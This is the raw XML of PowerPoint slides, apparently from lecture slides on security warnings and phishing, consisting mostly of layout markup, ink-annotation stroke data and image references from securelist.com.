            <a:rPr kumimoji="1" lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t>ested</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>: Test your dialog on a few people who haven’t used the system before -- both malicious and benign situations.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5541220" y="634579"/>
        <a:ext cx="4860674" cy="3482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1T21:22:23.641"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#941100"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 35 24575,'15'0'0,"-1"0"0,9 0 0,-9 0 0,14 0 0,-17 0 0,0-4 0,-1 4 0,2-4 0,2 4 0,1 0 0,0 0 0,5 0 0,-7 0 0,7 0 0,-12 0 0,3-3 0,-4 2 0,0-2 0,0 3 0,1 0 0,-1 0 0,0 0 0,1 0 0,2 0 0,-2 0 0,3 0 0,-4 0 0,4 0 0,0 0 0,4 0 0,-1 0 0,1 0 0,6 0 0,-5 0 0,5-3 0,-7 2 0,1-2 0,-4 3 0,3 0 0,-6 0 0,6 0 0,-2 0 0,2 0 0,1 0 0,0 0 0,-1 0 0,1-4 0,0 3 0,-4-2 0,3 3 0,-3 0 0,4 0 0,0 3 0,-1-2 0,1 2 0,0-3 0,-1 0 0,-2 0 0,2 0 0,10 0 0,-1 0 0,6 4 0,-3-4 0,-3 8 0,5-7 0,10 9 0,-7-9 0,2 5 0,-12-6 0,-7 0 0,7 0 0,-5 0 0,5 0 0,6 0 0,-13 0 0,13 3 0,-10-2 0,-4 2 0,12-3 0,-12 0 0,14 0 0,-5 0 0,6 4 0,11-3 0,2 9 0,7-8 0,3 4 0,-13-6 0,-5 0 0,-7 0 0,-4 0 0,17 0 0,-8 0 0,7 0 0,1 0 0,-8 0 0,8 0 0,-11 4 0,-6-3 0,-2 3 0,-5-4 0,12 0 0,-9 0 0,9 0 0,-12 0 0,-4 0 0,9 0 0,-7-3 0,13-2 0,-9 0 0,3 1 0,1 4 0,1 0 0,29 0 0,-23 0 0,16 0 0,-29 0 0,-4 0 0,0 0 0,5 0 0,3 0 0,9 0 0,11 0 0,-2 0 0,14 0 0,-14-4 0,13 3 0,-9-3 0,1 4 0,-3 0 0,-17 0 0,-2 0 0,-5 0 0,0-4 0,-4 4 0,9-12 0,-7 10 0,4-10 0,-3 11 0,-3-2 0,4 3 0,0 0 0,-1 0 0,14 0 0,-11 0 0,11 0 0,-8 0 0,2 0 0,6 4 0,0-3 0,-6 3 0,5-4 0,-5 0 0,6 4 0,0 2 0,1-1 0,-10-1 0,1-4 0,-3 0 0,-4 0 0,7 0 0,-12 0 0,6 0 0,-6 0 0,3 0 0,-4 0 0,3 0 0,-1 0 0,1 0 0,1 0 0,0 0 0,4 0 0,-4 0 0,3 3 0,3-2 0,-4 5 0,7-5 0,-9 6 0,4-6 0,6 2 0,-5-3 0,10 0 0,-9-3 0,3 2 0,-5-3 0,3 4 0,-3 0 0,3 0 0,-3 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-3 0,7 2 0,-5-2 0,5 0 0,-10-1 0,3-1 0,-2 2 0,2 3 0,-2 0 0,-2 0 0,1 0 0,0 0 0,4 0 0,5 0 0,2 0 0,1 0 0,3 0 0,-10-3 0,11 2 0,-11-2 0,11-1 0,-5 4 0,7-4 0,-1 4 0,0 0 0,11 0 0,2 0 0,1 0 0,7 0 0,-7 0 0,-1 4 0,9-2 0,2 8 0,3-2 0,19 0 0,-19 4 0,31-11 0,-17 5 0,9-6 0,-26 0 0,-19 0 0,4 0 0,-12 0 0,8-3 0,-12 2 0,-7-2 0,7 3 0,-5 0 0,45-7 0,-20 5 0,45-12 0,-31 13 0,-9-9 0,24 9 0,-29-3 0,33 4 0,-33 0 0,-8 0 0,-12 0 0,-1 5 0,2-4 0,6 7 0,-6-7 0,-1 3 0,-10-4 0,3 0 0,-2 0 0,2 0 0,-2 0 0,-2 0 0,-2 0 0,-1 0 0,4 0 0,0 3 0,10-2 0,-5 2 0,1-3 0,-3 0 0,-6 0 0,6 0 0,-3 0 0,4 0 0,6 0 0,-5 0 0,10 0 0,-4 0 0,0 0 0,-1 0 0,0 0 0,-5 0 0,10 0 0,9 0 0,7 0 0,12 0 0,-19 0 0,3 0 0,-16 0 0,6 0 0,0 0 0,-6 0 0,4 0 0,-4 0 0,6 0 0,0 0 0,11 0 0,3-5 0,-1 3 0,-8-7 0,-6 8 0,-5-2 0,1 3 0,-6 0 0,3 0 0,-7 0 0,14 0 0,-5 0 0,-3 0 0,0 3 0,-11-2 0,6 5 0,-2-5 0,9 6 0,1-2 0,7-1 0,-1 0 0,0-4 0,11 0 0,2 0 0,1 0 0,-4 0 0,-10 0 0,-6 0 0,-1 0 0,-6 0 0,-1 3 0,-2-2 0,-2 2 0,8 0 0,-9-2 0,8 2 0,-6-3 0,0 0 0,4 0 0,-4 0 0,3 0 0,14 0 0,-9 0 0,13 0 0,-18 0 0,7 0 0,12 0 0,21 0 0,1 0 0,10 0 0,-24 0 0,-2 0 0,-11 0 0,-9 0 0,7 0 0,-14 0 0,9 0 0,-3 0 0,-3 0 0,0 0 0,-4 0 0,-4 0 0,0 0 0,4 0 0,-3 4 0,3-3 0,-1 2 0,7-3 0,6 0 0,-1 3 0,4-2 0,-4 2 0,0-3 0,16 0 0,-14 0 0,38 0 0,-17 0 0,9-4 0,-21 3 0,-7-8 0,7 8 0,-8-3 0,12 4 0,-24 0 0,34 0 0,-28 0 0,29 0 0,-32 0 0,5 0 0,-7 0 0,-2 3 0,20 7 0,-10-1 0,29 6 0,-10-4 0,22 3 0,3-6 0,-11 3 0,5-10 0,-7 10 0,23-10 0,-7 12 0,-7-12 0,-22 5 0,-21-6 0,-2 0 0,-10 0 0,1 0 0,-1 0 0,0 0 0,4 0 0,0 0 0,0 0 0,3 0 0,-2 0 0,8-4 0,-3 3 0,3-3 0,1 4 0,-8-3 0,6 2 0,-10-3 0,1 1 0,1 2 0,0-2 0,0 3 0,3 0 0,-6 0 0,3-3 0,-7-1 0,3-4 0,-3 1 0,0-1 0,2 4 0,-5-2 0,5 5 0,5-2 0,1 3 0,6 0 0,-3 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,7 0 0,12 0 0,8 0 0,1 0 0,3 0 0,-5 0 0,8 5 0,-12-3 0,23 4 0,-10-6 0,17 0 0,7 0 0,-28 0 0,15 0 0,-29 0 0,7 0 0,-3 0 0,-11 0 0,9 0 0,0 0 0,-9 0 0,24 0 0,-12 0 0,16 0 0,0 0 0,-10 0 0,-3 0 0,-11 0 0,0 0 0,0 0 0,17 3 0,-2-2 0,5 6 0,-9-6 0,0 3 0,-9-4 0,9 4 0,0-3 0,2 3 0,33-4 0,-16 0 0,5 0 0,-30-3 0,-13 2 0,1-5 0,-4 5 0,4-2 0,-10 3 0,0 0 0,-4 0 0,4 0 0,-3 0 0,3 0 0,-4 0 0,3 0 0,2 0 0,2 0 0,1 0 0,6 3 0,-4-2 0,4 2 0,0-3 0,11 0 0,-1 0 0,19-6 0,-9 5 0,11-5 0,11 6 0,-24 0 0,20 0 0,-24 0 0,7 0 0,-10-4 0,-11 4 0,6-8 0,-3 7 0,10-3 0,-6 0 0,-5 3 0,-6-3 0,-3 4 0,-3 0 0,4-4 0,0 3 0,-1-2 0,1 0 0,0 2 0,5-2 0,9 3 0,-5 0 0,-1 0 0,-9 0 0,-2 0 0,8 0 0,-4 3 0,22-2 0,-13 6 0,13-6 0,-10 3 0,-6-4 0,6 0 0,-15 0 0,7 0 0,-9 0 0,4 0 0,6 0 0,-5 0 0,4 0 0,1 0 0,-5 0 0,2 0 0,-5 0 0,-1 0 0,3 0 0,-4 0 0,9 0 0,11 0 0,11 0 0,12 0 0,-2 0 0,-10 0 0,-4 0 0,1 0 0,-8 0 0,8 0 0,-21 0 0,8 0 0,-7 0 0,20 0 0,-9-4 0,22 3 0,-21-3 0,9 4 0,-12 0 0,11 0 0,-8 0 0,7 0 0,1 6 0,-8-5 0,8 9 0,-1-3 0,4 4 0,23 2 0,-10 0 0,-1-5 0,6-3 0,-16-5 0,30 0 0,-8 0 0,10 0 0,1 0 0,-22 0 0,-6 0 0,-21 0 0,-6 0 0,-1-3 0,0 2 0,-5-5 0,4 5 0,-8-6 0,5 7 0,-8-4 0,5 4 0,-4 0 0,2 0 0,8 0 0,-4 0 0,5 0 0,-6 0 0,-1 0 0,1 0 0,-3 0 0,-2 0 0,-3-3 0,1 2 0,-1-2 0,0 0 0,1 2 0,-1-3 0,0 4 0,0-3 0,4 2 0,-3-2 0,3 3 0,-1 0 0,-2 0 0,6 0 0,-6-3 0,6 2 0,-6-2 0,3-1 0,-4 3 0,0-2 0,1 0 0,-1 2 0,0-2 0,1 3 0,2 0 0,-2 0 0,3 0 0,-1 0 0,-1 0 0,4 0 0,-1 0 0,3 0 0,5-4 0,-4 3 0,11-8 0,-14 8 0,7-3 0,-9 4 0,0 0 0,0 0 0,-4-3 0,4 2 0,0-2 0,0 3 0,0 0 0,-4 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-3 3 0,6-2 0,-5 2 0,9-3 0,-6 3 0,3-2 0,-1 2 0,-2-3 0,3 0 0,0 0 0,-3 0 0,2-3 0,-2 2 0,2-2 0,-2 3 0,6 0 0,-6 0 0,3 0 0,-4 0 0,4 0 0,0 0 0,4 0 0,-4 0 0,0 0 0,-4 0 0,0 0 0,1-4 0,-1 4 0,0-4 0,0 4 0,4-3 0,-3 2 0,-1-5 0,0 5 0,-3-3 0,7 4 0,-3 0 0,2 0 0,1 0 0,-3-3 0,2 2 0,1-5 0,-3 5 0,6-2 0,-3-1 0,10 4 0,-8-4 0,7 1 0,-12 2 0,2-2 0,1 3 0,-3-3 0,3 2 0,-4-6 0,0 6 0,0-2 0,1 0 0,-1 2 0,0-2 0,4-1 0,-3 0 0,3 0 0,-4-3 0,0 7 0,0-4 0,1 4 0,-1 0 0,0 0 0,4 0 0,6 0 0,-1 0 0,2 0 0,-8 0 0,-2 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,2 0 0,2 0 0,-1 4 0,0-4 0,-4 4 0,0-4 0,1 0 0,-1 0 0,0 0 0,0 0 0,10 0 0,-8 0 0,17 0 0,-13 0 0,4 0 0,-6 0 0,-4 0 0,1 0 0,-1 0 0,3 0 0,-2 3 0,3-2 0,-4 2 0,1-3 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-3 3 0,2-2 0,-2 2 0,4-3 0,-1 0 0,4 3 0,-3-2 0,2 2 0,1 1 0,-3-3 0,3 2 0,-4-3 0,0 0 0,4 0 0,0 0 0,4 3 0,5-2 0,-3 5 0,9-1 0,-4 0 0,-3-1 0,-3-4 0,-8 0 0,-1 0 0,0 0 0,4 0 0,0 3 0,4 1 0,-4 0 0,0-1 0,-4-3 0,1 0 0,-1 0 0,3 0 0,2 0 0,-1 0 0,9 0 0,-7 0 0,4 3 0,-3-2 0,-6 2 0,6-3 0,-3 0 0,4 0 0,0 4 0,0-3 0,-1 2 0,1 0 0,6-2 0,-5 5 0,4-5 0,-8 2 0,2-3 0,-3 0 0,4 4 0,-1-4 0,7 4 0,-5-1 0,11-2 0,-5 6 0,6-6 0,0 3 0,-6-1 0,-1-2 0,-7 2 0,1-3 0,23 6 0,-18-4 0,24 8 0,-11-9 0,-2 7 0,-2-7 0,-9 3 0,-12-4 0,3 0 0,-4 0 0,0 0 0,1 0 0,2 0 0,2 0 0,8 0 0,-4 0 0,5 0 0,0 0 0,-5 0 0,1-3 0,-6 2 0,-4-2 0,3 3 0,2 0 0,3 0 0,-1 0 0,-2 0 0,1 0 0,5 0 0,-2 0 0,5 0 0,-7 0 0,-2-4 0,2 4 0,-3-4 0,4 4 0,5 0 0,-7 0 0,7 0 0,-9 0 0,1 0 0,2 0 0,-6-3 0,2 2 0,-2-5 0,2 5 0,-2-6 0,6 6 0,-6-2 0,6 3 0,-6-3 0,6 2 0,-6-2 0,3 3 0,-1-4 0,-2 4 0,3-4 0,-4 4 0,4 0 0,-3 0 0,6 0 0,-6 0 0,6 0 0,-3-3 0,4 2 0,-4-2 0,0 3 0,-1 0 0,-1 0 0,4 0 0,-4 0 0,1 0 0,1 0 0,0 0 0,4 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,-2 0 0,2 0 0,-3 0 0,0 0 0,0 0 0,-1 0 0,-1 0 0,4 0 0,2 0 0,1 0 0,-2 0 0,-3 0 0,-4 0 0,4 0 0,7 0 0,-2 3 0,5-2 0,-9 2 0,1 0 0,-4-2 0,1 2 0,-3-3 0,-3-3 0,3 2 0,-3-2 0,3 3 0,4 0 0,-3 0 0,3 0 0,-4 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,4 0 0,-3 0 0,2 0 0,-2 0 0,-1 0 0,0 0 0,4 0 0,-3 0 0,2 0 0,-2 0 0,-1 0 0,3 0 0,-1 0 0,1 0 0,-3-3 0,1 2 0,-1-2 0,0 3 0,1 0 0,-1 0 0,3 0 0,-1 0 0,4 0 0,-4 0 0,4 0 0,-4 0 0,4 0 0,-4 0 0,1 0 0,-3-4 0,1 3 0,-1-2 0,0 3 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,3 0 0,2 0 0,-1 0 0,0 0 0,-4 0 0,0 0 0,4 0 0,-3 0 0,3 0 0,-1 0 0,2 0 0,-1 0 0,3 0 0,-6 0 0,3 0 0,-4 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,2 3 0,-2-2 0,6 2 0,-6 1 0,3-3 0,-4 2 0,0-3 0,1 0 0,2 0 0,2 0 0,2 0 0,-2 0 0,8 0 0,-11 0 0,8 0 0,-7 0 0,-2 0 0,3 0 0,-4 0 0,1 0 0,2 0 0,1 0 0,1 0 0,-2 0 0,1 3 0,-3-2 0,3 2 0,-4-3 0,0 0 0,4 0 0,-3 0 0,3 0 0,-4 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,4 0 0,-3 0 0,2 0 0,1-3 0,-3 2 0,6-2 0,-6 3 0,6 0 0,-3 0 0,4 0 0,-4 0 0,0 0 0,-4 0 0,0 0 0,1 0 0,-1 0 0,4 0 0,6 0 0,-1 0 0,11 0 0,-15 0 0,8-4 0,-12 4 0,3-7 0,-4 6 0,1-2 0,-1 3 0,0 0 0,4-3 0,-3 2 0,6-3 0,-6 4 0,6 0 0,-6 0 0,2 0 0,-2 0 0,-4-3 0,2 2 0,-2-5 0,3 5 0,1-2 0,-1 3 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,3 0 0,-1 0 0,4 0 0,-4 0 0,1 0 0,-3 0 0,1 0 0,-1 3 0,0-2 0,1 2 0,-1-3 0,0 0 0,0 0 0,-3 3 0,3-2 0,-3 2 0,3-3 0,1 3 0,-1-2 0,0 2 0,0-3 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-3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1T21:22:26.490"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#941100"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 26 24575,'16'0'0,"-3"0"0,10 4 0,-2-4 0,24 4 0,18-4 0,-5 0 0,25 0 0,8 0 0,-31 0 0,0 0-389,35-4 1,-5 0 388,0 2 0,-8-5 0,-38 7 0,9-4 0,-20 3 0,-16-7 0,-7 7 0,-2-2 777,-4 6-777,-1 1 0,-3 4 0,3-4 0,1-1 0,4-3 0,-4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08:40:28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3095 1237 24575,'-23'-35'0,"-38"-16"0,9 28 0,-4-1 0,-4-1-3288,-32-6 3288,28 5 0,-3-2 0,7 5 0,0 0 0,-7-5 0,-1 1 0,-1 4 0,3 1 0,10-4 0,0-1 0,-2 5 0,2-1 0,-23-24 0,-6 9 0,1 0 0,10 2 0,24 12 0,1-1-6534,-25-13 6534,27 9 0,-5-1 786,-13-3 1,-3-2-787,-10-7 0,-4 0 0,14 12 0,-2 2 0,3 1 0,-8-5 0,5 4 0,2 8 0,5 3 0,-7-8 0,0 5 0,22-2 0,-2 7 1118,21 10-1118,-23-9 6612,10 12-6612,-10-6 519,14 8-519,9 0 0,-7 0 0,19 0 0,-10 0 0,12 0 0,-1 0 0,2 0 0,4 0 0,0 0 0,4 5 0,2 0 0,4 5 0,4 4 0,3 9 0,4 7-6784,0-1 6784,2 7 0,-3-19 0,-4 10 0,-1-12 0,-5 0 0,0-1 0,0-4 6784,7 27-6784,11 6 0,1 27 0,8-23 0,-13-9 0,-4-28 0,-6-6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08:40:29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08:40:29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0 425 24575,'84'-38'0,"0"0"0,0 0 0,0 0 0,-6 3 0,0 1 0,-5 1 0,-13 5 0,-9 1 0,-9 4 0,22-7 0,-17-2 0,-32 22 0,-1 4 0,-8-3 0,-2 8 0,-4-3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08:51:59.274"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.5" units="cm"/>
      <inkml:brushProperty name="height" value="1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFD78"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 245 16383,'74'5'0,"-3"-1"0,-41-4 0,22 0 0,3 0 0,30 0 0,-37-4 0,6-2 0,35-5 0,2 0 0,-23 4 0,0-1 0,16-7 0,-6 2 0,-8 11 0,-26-10 0,-17 11 0,-11-4 0,23 5 0,-18 0 0,19 0 0,-12 0 0,-7 5 0,32 0 0,-27 0 0,27 0 0,-31-5 0,6 0 0,8 0 0,-12 0 0,12 0 0,-7 0 0,-7 4 0,15 1 0,-15 1 0,14-2 0,8-4 0,-3 0 0,11 0 0,-22 0 0,5 0 0,-13 0 0,5 0 0,2 5 0,-7-4 0,14 3 0,8-4 0,-3 0 0,25 0 0,-24 0 0,9 0 0,-21 0 0,6 0 0,-15 0 0,7 0 0,8 0 0,-12 0 0,8 0 0,-5 0 0,-9 0 0,27 0 0,-21 0 0,34 0 0,-32 0 0,24 0 0,-6 0 0,-3 5 0,25-3 0,-10 3 0,28-5 0,4 0 0,-37 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-2 0,1-3 0,-1-1 0,37 3 0,-19-7 0,-2 9 0,-26 0 0,11 0 0,-15 0 0,-7 0 0,5 0 0,-13 0 0,14-6 0,-7 5 0,23-5 0,4 6 0,14 0 0,14 0 0,4 0 0,-30-4 0,1-2 0,-7 1 0,2-1 0,11-6 0,1 1 0,-12 5 0,-2 1 0,-1-4 0,0 0 0,48-2 0,-25-7 0,12 7 0,-38 3 0,-3 8 0,-26 0 0,1 0 0,21 0 0,-16 0 0,23 0 0,-18-6 0,7-1 0,15-8 0,-11 8 0,11-7 0,-14 13 0,-1-5 0,-7 2 0,5 3 0,-13-4 0,14 5 0,-15 0 0,23 0 0,-20 0 0,8 0 0,-4 0 0,-11 0 0,19 6 0,-14 0 0,28 8 0,-17-8 0,19 2 0,0 0 0,4-6 0,13 13 0,-13-13 0,10 6 0,-25-8 0,26 0 0,-26 0 0,11 0 0,-15 0 0,-7 0 0,5 0 0,-13 4 0,14 3 0,-15-1 0,29 7 0,-2-11 0,22 6 0,0-8 0,-15 0 0,26 0 0,9 0 0,2 0 0,-40 0 0,-2 0 0,19 0 0,-13 0 0,10 0 0,-25 0 0,26 8 0,-26-6 0,25 5 0,-25-7 0,26 0 0,-26 6 0,25-5 0,-25 10 0,26-9 0,3 3 0,-11 1 0,36-5 0,-36 5 0,25-6 0,-14 0 0,0 0 0,0 0 0,0-8 0,15 6 0,-20-2 0,3 0 0,-5 4 0,2 0 0,24-5 0,3-1 0,-9 5 0,1 0 0,8-5 0,2 1 0,-27 4 0,1 2 0,-2-1 0,20 1 0,-1-2 0,6-4 0,-3-1 0,-25 1 0,-2-2 0,6 1 0,-3-1 0,10-7 0,6 12 0,-46-3 0,15 5 0,-19 0 0,22 15 0,-11-5 0,11 12 0,0-7 0,3-8 0,15 9 0,0-6 0,17 5 0,-13-6 0,-10-3 0,-14-1 0,-20-4 0,0 5 0,1-10 0,-10-2 0,7 1 0,2 0 0,18 5 0,9 0 0,27 0 0,-34 0 0,2 0 0,1 4 0,0 1 0,12-4 0,1 0 0,-5 4 0,-1-1 0,0-3 0,0-2 0,-1 1 0,-1 0 0,-6 0 0,-2 0 0,1 0 0,1 0 0,7 0 0,-1 0 0,33 0 0,-33 0 0,-3 0 0,4 0 0,0-4 0,-32-1 0,-11-5 0,15-5 0,-4 9 0,15-3 0,25 9 0,6 9 0,-16-3 0,3 0 0,-6 0 0,-2 0 0,36 4 0,-7-10 0,-40 0 0,11 0 0,-15 0 0,1 0 0,-1 0 0,15 0 0,4 7 0,14-5 0,14 15 0,-34-15 0,2-2 0,1 5 0,0-1 0,13-4 0,-1 0 0,-12 5 0,0-1 0,13-2 0,0-1 0,-13 3 0,0 1 0,5-5 0,0 0 0,-6 0 0,-1 0 0,0 0 0,0 0 0,37 0 0,-3 0 0,-30 0 0,-3 0 0,-15 0 0,1 0 0,0 0 0,-9 0 0,7 0 0,8 0 0,-3 0 0,3 0 0,-17 0 0,2 0 0,-7-5 0,23-1 0,-26 0 0,24 0 0,-18 6 0,13 0 0,-1 0 0,1 0 0,-1 0 0,-7 0 0,20 0 0,-3 0 0,23 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-14-5 0,-5-2 0,-13 0 0,0 1 0,-9 2 0,7 2 0,-15-2 0,7 4 0,-4-9 0,1-2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08:52:02.151"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.5" units="cm"/>
      <inkml:brushProperty name="height" value="1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFD78"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 16383,'76'10'0,"-1"-1"0,-1 1 0,0 1 0,1 0 0,0 1 0,0 0 0,3-1 0,18-3 0,4-3 0,-32-1 0,0 0 0,1-1 0,2-2 0,2-2 0,1 1 0,7 0 0,1 0 0,-1 0 0,-6 0 0,-1 0 0,0 0 0,4-1 0,0 1 0,-1 1 0,-4 2 0,-2 1 0,0 0 0,-3-3 0,-1-1 0,-1 2 0,28 3 0,-2 1 0,-8-6 0,-1 0 0,-7 0 0,-3 0 0,-4 0 0,-3 0 0,-5 0 0,-1 0 0,-1 0 0,-2 0 0,31 0 0,-3 0 0,-30 0 0,-3 0 0,-14 0 0,-1 0 0,-7-5 0,5 4 0,-13-3 0,5-1 0,1 4 0,2-3 0,7 4 0,15 0 0,4 0 0,-1 0 0,11 0 0,4 0 0,4 0 0,25 0 0,-11 0 0,-37-4 0,0-1 0,0-1 0,1 0 0,-1 1 0,0-1 0,1-3 0,-2 0 0,38-1 0,11-1 0,-25 3 0,10 0 0,-14 6 0,0-6 0,0 8 0,0 0 0,14 0 0,4 0 0,-22 0 0,2 0 0,-13 0 0,0 0 0,5 0 0,-1 0 0,40 0 0,-11 0 0,-37 0 0,0 0 0,37 0 0,-18 0 0,-3 0 0,-12 0 0,30 0 0,-12 0 0,26 0 0,-25 0 0,24 0 0,-24 0 0,25 0 0,-26 0 0,-3 0 0,-26 0 0,-16 0 0,-8 0 0,12 0 0,3 0 0,1 0 0,4 6 0,-10-5 0,7 5 0,15 1 0,18-5 0,4 14 0,10-14 0,0 5 0,-10 1 0,25-6 0,-26 6 0,26-8 0,-25 0 0,10 0 0,-14 0 0,-14 0 0,10 0 0,-25 0 0,11 0 0,-14 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-9 0 0,7 0 0,-15 0 0,7 0 0,-8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7250E-0EEC-3342-BAA1-2161A6B2A476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9F8A5-8FD6-EA4C-8C10-4D7FB5642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6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66000214-1431-CD4A-B5AD-B87520D5D6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50725B7B-44C0-F647-B5E4-1C99532B2D3A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9EE66ED-15C7-6241-94E2-034EF3A966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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm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FE35E624-1F64-4A41-BEE4-B3E9E5D4D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6230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4900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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8AB8489-811E-F548-9310-79C920302D86}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22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724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4900" cy="3479800"/>
          </a:xfrm>
          <a:ln/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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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1299A81-2616-7445-B87A-E37820552B22}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23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514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4900" cy="3479800"/>
          </a:xfrm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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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B0883D0-088A-614D-9C35-9CFA5DB5CD8F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24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151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4900" cy="3479800"/>
          </a:xfrm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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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B0883D0-088A-614D-9C35-9CFA5DB5CD8F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25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370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4900" cy="3479800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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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E3CEAF8-42E7-544F-822C-BC0D360DDE91}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26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78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4900" cy="3479800"/>
          </a:xfrm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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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813DDB0-9696-FA42-89DB-C0A09A443425}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27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71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4900" cy="3479800"/>
          </a:xfrm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12415" indent="-274006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96023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34432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72841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11250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49659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88068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26477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E75153F-C592-8441-92A2-B25DB58166E6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30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760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9/13/21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0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7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8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1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6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9/13/21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30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3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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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62BE8DAC-AFAE-F54B-82D7-32EC0C065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2" r="19090" b="-3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81EC1-E2C4-BE41-B86A-1C257788F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Phishing</a:t>
            </a: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SECURITY WARNINGS</a:t>
            </a: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Vitaly Shmatikov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89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2" descr="http://www.securelist.com/en/images/pictures/klblog/208193327.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC313F9-4B9F-534C-9D7C-8A88961C2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661" y="1843432"/>
            <a:ext cx="40576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8" name="Picture 4" descr="http://www.securelist.com/en/images/pictures/klblog/208193328.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16CFB23-379D-3D45-9805-0BBAFD0B8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12" y="2677319"/>
            <a:ext cx="4227513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0" name="Picture 6" descr="http://www.securelist.com/en/images/pictures/klblog/208193329.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C8987D-5171-214B-B024-83B5A2FEB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431" y="1592452"/>
            <a:ext cx="5127625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576ADE7-11F6-0947-9384-BF737B210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133726"/>
            <a:ext cx="3240088" cy="143827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77CCC6-683B-AD4F-A9B6-71C9F16B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“Payment Verification”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362A9A-106B-4743-8E81-1E9B61651241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5071820" y="6069998"/>
            <a:ext cx="6746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1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>securelist.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
